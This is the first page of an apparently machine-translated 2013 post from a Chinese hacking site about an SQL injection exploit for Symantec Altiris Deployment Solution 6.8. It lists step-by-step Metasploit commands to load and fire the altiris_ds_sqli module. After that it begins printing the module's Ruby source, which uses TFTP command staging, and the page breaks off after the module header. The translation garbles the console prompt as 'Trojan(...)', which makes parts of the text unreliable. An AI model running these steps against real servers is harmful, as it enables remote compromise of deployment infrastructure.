Symantec SQL injection exp-vulnerability warning-the black bar safety net

ID MYHACK58:62201341307
Type myhack58
Reporter 佚名
Modified 2013-11-28T00:00:00


the msf under exp attack examples:

msf > use exploit/windows/misc/altiris_ds_sqli

msf >Trojan(altiris_ds_sqli) > show targets

msf >Trojan(altiris_ds_sqli) > set TARGET <target-id>

msf >Trojan(altiris_ds_sqli) > show options

msf> Trojan(altiris_ds_sqli) > exploit

exp attack code is as follows:

This file is part of the Metasploit Framework and may be subject to

redistribution and commercial restrictions. Please see the Metasploit

Framework web site for more information on licensing and terms of use.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::CmdStagerTFTP

include Msf::Exploit::Remote::Tcp

def initialize(info = {})


'Name' => 'Symantec Altiris DS SQL Injection',

'Description' => %q{

This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8

[1] [2] [3] [4] [5] [6] [7] [8] [9] next